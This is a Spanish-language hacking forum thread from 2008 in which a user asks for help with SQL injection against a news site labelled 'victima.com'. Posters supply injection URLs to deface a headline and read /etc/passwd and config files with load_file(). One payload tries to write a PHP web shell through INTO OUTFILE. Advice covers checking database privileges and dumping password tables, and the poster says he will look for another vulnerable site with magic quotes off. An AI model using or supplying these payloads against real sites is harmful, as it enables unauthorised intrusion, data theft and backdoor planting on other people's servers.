Autor
|
Tema: Sql injection! Ayuda con esto! (Leído 4,434 veces)
|
[{O_o}]
Desconectado
Mensajes: 53
|
http://victima.com/noticias.php?id=1;update noticias set titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43), char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/* este es el query You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0 este es el error lo que no entiendo es por que no corre
|
|
|
En línea
|
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
Hasta donde yo recuerdo no podes hacer ;otrasentencia en sqlinjection =\ tal vez por eso te da el error ñ_ñ
Lo que podrias hacer es sacar info del server, y luego conectarte via remota (si es posible) o meter una shell (tambien si es posible) o sacar los datos del login de administracion del sistema =\
|
|
|
En línea
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
hola,
no creo que puedas lograr eso. Lo primero seria sacar datos de la base de datos con UNION SELECT y ver analizando si hay una tabla de passwords. Ademas reconoce que sistema e intenta volcar los contenidos de ficheros importantes, tal vez config.php o /etc/passwd con la función load_file()
saludos,
|
|
|
En línea
|
|
|
|
[{O_o}]
Desconectado
Mensajes: 53
|
Buen gracias por las respuesta! Estoy tratando de usera el load_file() para ver que pasa gracias. http://www.victima.com/noticias.php?id=1%20union%20select%201,2,3,load_file(concat(char(0x22)%2bchar(0x69)%2bchar(0x6e)%2bchar(0x64)%2bchar(0x65)%2bchar(0x78)%2bchar(0x2e)%2bchar(0x70)%2bchar(0x68)%2bchar(0x70)%2bchar(0x22))),5,6,7%20from%20noticias/* No me da error pero tampocomo me muesta los datos me puede explicar porue no muestra los datos!
|
|
« Última modificación: 10 Diciembre 2008, 19:43 pm por [{O_o}] »
|
En línea
|
|
|
|
Teddy Picker
Desconectado
Mensajes: 95
"... En cambio deseo el cielo"
|
Si, si eso esta bien... pero porque tienes que usar todos esos caracateres en concat??? Simplemente puedes juntar la notacion hexadecimal de cada caracter de "/etc/passwd" Asi quedaria: load_file(0x2f6574632f706173737764)
|
|
|
En línea
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
es posible que el usuario de myql que está ejecutra los scripts web no tenga los privilegios FILE para poder leer archivos. Intenta con union select user() para saber el usuario.
cuenta como vas,
saludos
|
|
|
En línea
|
|
|
|
[{O_o}]
Desconectado
Mensajes: 53
|
gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!
Pero tambien encontre otra web esta ves el user es root@localhost perfecto! Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE o un buen manual.
UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1
gracias por adelantado!
|
|
« Última modificación: 11 Diciembre 2008, 16:27 pm por [{O_o}] »
|
En línea
|
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
es que tiene magic_quotes activado, y este si que no lo saltas, el "into dumpfile" y el "into outfile" siempre ocupa las comillas y sin este no funciona =\
mas abajo encontraras esa misma duda foro.elhacker.net/bugs_y_exploits/como_hacer_into_outfile_si_tengo_magicquotes-t234737.0.html
y poco mas abajo encontraras otras formas de meter shell ñ_ñ
foro.elhacker.net/bugs_y_exploits/web_vulnerabilities_to_gain_access_to_the_system-t231238.0.html
y aun asi a veces no encuentro la forma de meter shell xDDD
|
|
|
En línea
|
|
|
|
[{O_o}]
Desconectado
Mensajes: 53
|
Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off
|
|
|
En línea
|
|
|
|
|
|